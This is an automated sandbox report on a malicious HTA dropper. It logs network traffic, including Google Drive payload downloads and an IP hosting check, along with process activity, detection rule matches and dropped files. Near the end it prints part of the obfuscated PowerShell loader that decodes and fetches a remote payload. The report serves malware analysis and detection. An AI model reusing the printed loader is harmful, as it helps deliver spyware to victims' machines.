Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: orden_0099896754537687897657436786756785654576.hta |
Virustotal: Detection: 8% |
Perma Link |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2 |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: m.Core.pdbn source: powershell.exe, 00000005.00000002.1525931065.000000000810E000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.1513044030.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbU source: powershell.exe, 00000005.00000002.1521375542.0000000007232000.00000004.00000020.00020000.00000000.sdmp |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: Joe Sandbox View |
IP Address: 208.95.112.1 208.95.112.1 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
DNS query: name: ip-api.com |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1ab9_GWcEAQXw3xvYd7DiUMBIo1Nlkti9&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: unknown |
DNS traffic detected: queries for: drive.google.com |
Source: svchost.exe, 00000004.00000002.2413923989.000001BF45E00000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.ver) |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20 |
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000001.00000002.1697395646.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.00000000046B1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.000000000452C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatbXRhj |
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.000000000469C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1aFW_bURNX9tFO3OO2SRxjlcNK9uxhatb&export=download |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C99000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/Prod1C: |
Source: svchost.exe, 00000004.00000003.1203370963.000001BF45C40000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C: |
Source: powershell.exe, 00000005.00000002.1514647144.000000000480C000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004AAC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000001.00000002.1732568845.0000000005437000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1518186939.0000000005718000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000001.00000002.1697395646.0000000004698000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49700 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49711 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49699 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49699 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49710 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49710 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49700 -> 443 |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49699 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49700 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.253.124.102:443 -> 192.168.2.7:49710 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.7:49711 version: TLS 1.2 |
Source: amsi32_6504.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: Commandline size = 6335 |
|
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6335 |
|
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: Commandline size = 6335 |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 6335 |
Jump to behavior |
Source: C:\Windows\System32\svchost.exe |
File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_00CBFB98 |
1_2_00CBFB98 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 1_2_00CBF850 |
1_2_00CBF850 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248ACF38 |
17_2_248ACF38 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A4A80 |
17_2_248A4A80 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A3E68 |
17_2_248A3E68 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_248A41B0 |
17_2_248A41B0 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A9B30 |
17_2_271A9B30 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A1808 |
17_2_271A1808 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Code function: 17_2_271A3080 |
17_2_271A3080 |
Source: C:\Windows\SysWOW64\mshta.exe |
Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE |
Jump to behavior |
Source: amsi32_6504.amsi.csv, type: OTHER |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 1224, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR |
Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution |
Source: classification engine |
Classification label: mal100.troj.spyw.evad.winHTA@13/11@3/4 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Roaming\Ponos.Lsi |
Jump to behavior |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ltlxalh1.220.ps1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1224 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6504 |
Source: C:\Program Files (x86)\Windows Mail\wab.exe |
WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor |
Source: C:\Windows\SysWOW64\mshta.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: orden_0099896754537687897657436786756785654576.hta |
Virustotal: Detection: 8% |
Source: unknown |
Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta" |
|
Source: C:\Windows\SysWOW64\mshta.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ungelatinizables = 1;$fostrene='Substrin';$fostrene+='g';Function Skftendes($Kriminologien){$Svanehamme54=$Kriminologien.Length-$Ungelatinizables;For($Ruslandsrejsernes=5; $Ruslandsrejsernes -lt $Svanehamme54; $Ruslandsrejsernes+=(6)){$Forbudsbestemmelserne+=$Kriminologien.$fostrene.Invoke($Ruslandsrejsernes, $Ungelatinizables);}$Forbudsbestemmelserne;}function bifilar($Unkneaded){. ($Aaretags) ($Unkneaded);}$Capitalizable=Skftendes 'PotliMTr,ceoChirozAflb,i .prrlTraadlSexboaUnde,/Sk,lp5Killi.Terri0 Rger Kolb (,picuWildr iHelmen RatidBegy.oGratiwMothes Quiv Pos.vNF,ereTPrepo rbe1Angle0B rre.Tandl0Tog m; ,ham FilthWUnconiko,pen disc6Smakk4 A yn;Lager Dara,xMa.nm6v.rsh4canva;Grave BlunrUdovevKry.r:Grema1Gigas2hals 1Foxes.Roddi0H gei)Sikat TailsGUnholeDespec rattk BonnoEtuie/Udgy 2Bauck0K.ast1I,kol0 Pr,z0Termo1Medle0 nlea1 Bles FratrF Un.giSlaskr S afe Tilmfunculo Ude,xToxop/ Sptt1Idrif2.ftgt1 Ep t. G sg0 Pert ';$ergometercykelen=Skftendes 'Fors UCystosSamtie olkrS,ovl-StinkAFo,urg Le.eeInt,rnBakketChlor ';$Enebrrets=Skftendes 'InstihSensitStrantUnexepStrubs Inte:P,yto/Ansva/ Noncd sem.r,ettoiStyrivLbehjeU.byt.Pole g BrisoR.dioo ndergDrosol PrizeIndex.transcHusbuo roglm B.ob/SvvefuTen.ncprogn?Had ne,iunixAntidpEnga,oMoater SofttFreds=PhytodInf,roBiogrwK.ejnnSand l Eft o Teleagastrdoldsa&Pi.niiResoudG and= ight1 Ur.naQueriFCoactW Sept_CyprabTromsUkun,tR Vi dNStok.XFr.it9EpipitOver.F oncoOpo.yg3 AntiOStrygOPsyc,2InvenSRibboR intexJivinjDeforlDobb.cSe.mlN ThinKS rti9 .arru Mer.x UdgahGld.taSynontSvin,bspec. ';$Foliose=Skftendes 'Lydis>Upbr. ';$Aaretags=Skftendes 'Kn gliFlereeNeutrx Azim ';$Luminarism = Skftendes 'PinnieFeriec De.thFl efoBagga Vaad% WortaSagebpRkee,pLandsdPersoaEnhedt Nonda M.do% Begy\FoldnP emio PrisnInturoLskedsCo lb.BannuLNonlosSpangiDimme Dra,e&Unlik& Appe ModereTutt.c Sh,khUdenloGangs Dext$St re ';bifilar (Skftendes 'Mexic$ReclugRumerl bogho A.stbEpiotaRverhlSentr:Trup.B ilcratebrelDyarclCrypto ersinSclereMonit=Dogli(,argicColasmfactodSmak, phono/AnnsocBugsp Ox da$Hypa LPo.duuPaea m KaloiTypolnRevera AntirMineri MisasTalemmHjlpe)krges ');bifilar (Skftendes 'z.nev$FictigUtrosl R,oto Sp.gbP,etea Salpl Lyst:MarshzGri.ao JvnsoPyj msForurpDatamo.vnfrrAmbroi ApplfCateceHemoerIn enophotou.remasTeake= ldef$DialuESammenUndive Pi,sbChallrChemorMidd.e SpidtOutdrsAffix. Fr s |